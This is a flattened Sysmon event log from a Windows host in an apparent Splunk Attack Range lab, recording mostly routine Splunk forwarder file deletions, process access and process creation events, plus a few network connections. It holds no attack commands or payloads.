disk space 23542300x800000000000000035083588Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:02.870{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7CCC15C7AA23E72E154CD8BD7D6119F,SHA256=389416D31BD7C46D023B939B027A4DA1737E54134CD48F7B093AB169D42C61FC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083589Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:03.884{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECA75C89B3CE7488446B2E205B0267CF,SHA256=608AF7C84AEC5213FFE1717569C1202ED715F59B100D58396C8BAE395DD127A7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083590Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:04.914{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4611529EF7AB85DECCFAD143DFC1D570,SHA256=31898CE1A92E44EC8CE150D04CA5A868CECB0A773B60198B9425B06B8916B69E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083591Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:05.947{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E19BEE13DD8E8E1D71D2C19D70E426E,SHA256=D1A8EE515338F30D78676FA4723FD6ACEE37AAD22F38D4EED43ABC2598F2F210,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083593Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:06.966{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF22996EFCCE151EFCD84EAFF324824D,SHA256=5C2EE35CEAF9DE9EED39AEE21B658FF8D4310247333F9B96293CCA19DD2855F3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000035083592Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:06.213{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=910CC6B4D3578D7E07A8DB5D4AAE6D27,SHA256=6DD9346E2C53CFB0909ED672B7E551C2015D14FFD095231980BDBF347327C559,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083596Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:07.981{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C47B145FB3145F5145AE8F8B939AFB06,SHA256=FA6853C2E80D1A8F50E474140C2D3EF764BFC061B973821DEDD4EBFB4D399787,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083595Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:32.093{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56496-false10.0.1.12-8000- 354300x800000000000000035083594Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:31.210{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56495-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083597Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:09.026{B81B27B7-4024-611D-7300-00000000C801}2188NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31FC17B945DAC0386F8156318B76EFAA,SHA256=74658ACF2D843153FA2D341CC22874B9D91B0656C4534BCC380813FCADBAE8EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083598Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:10.043{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55DB71AC607AF1F362BD12564A00C930,SHA256=2E523CBA6D67B38F5A6018C6B54CC7F0025D7ECA9E41A23CAB5BD1C68E4F9F30,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083601Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:36.222{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56497-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083600Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:11.446{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=4B483FC8C781EDFC9BBE51BC71D78271,SHA256=527BFCF54AB87B43B0649E0DEC3FFCF94F4C08CB255BD2B6EE4A0393BD140FEC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083599Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:06:11.065{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BBBE135E7EA88EC0012ACAF61A461692,SHA256=3C484BB7AE3921E7AF557CE1BB0ED5083B755D913A82860CE22D55E23534CE6D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083602Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:12.065{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3136D54A6485B4BEF222DDD84332F9C7,SHA256=97AC58AD21A6598A272832A0533577DACA28501C338C017E8F8498EC4F822152,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083613Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:37.258{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56498-false10.0.1.12-8000- 10341000x800000000000000035083612Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:13.564{B81B27B7-4D15-613A-1990-03000000C801}65245860C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083611Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:13.395{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4D15-613A-1990-03000000C801}6524C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083610Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:13.395{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083609Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:06:13.395{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083608Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:13.395{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083607Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:06:13.395{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083606Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:13.395{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4D15-613A-1990-03000000C801}6524C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083605Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:13.395{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4D15-613A-1990-03000000C801}6524C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035083604Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:13.381{B81B27B7-4D15-613A-1990-03000000C801}6524C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035083603Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:13.095{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D470447D1C157224725E6C2DB30E9A0F,SHA256=38D49AAF9A39CD390F0D6818EF8DCB918FDC7EF29315190690D345ECDCBA45FF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000035083624Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:14.394{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8B986B9817F38BAE92E83A227B66494E,SHA256=18E146EE176A7A677F40FA28EE4F4E4C8F0A59169C21D1180A97D9ED39B62037,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083623Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:14.394{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D7A53021D58B0FE07B23FA4E6B8A98DC,SHA256=F22DD8FE764888D171583F2EEB700D99231F6247C37063980F43385B6E2D6143,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083622Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:14.126{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA31B9F9C41EC3A3416F26F222412A95,SHA256=27CDE109711C326C607485C64A117A8BE09DC842D12EB3F2360F333599A780BC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035083621Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:14.094{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4D16-613A-1A90-03000000C801}2940C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083620Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:14.094{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083619Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:06:14.094{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083618Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:14.094{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083617Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:06:14.094{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083616Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:14.094{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4D16-613A-1A90-03000000C801}2940C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083615Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:14.094{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4D16-613A-1A90-03000000C801}2940C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035083614Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:14.080{B81B27B7-4D16-613A-1A90-03000000C801}2940C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035083625Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:15.129{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53A089F2D17818DE4703C4D57B1F7973,SHA256=128F89869B8037B014F3F6101AF27F1B019B97413131369138DE294A20BC1FCA,IMPHASH=00000000000000000000000000000000falsefalse - 
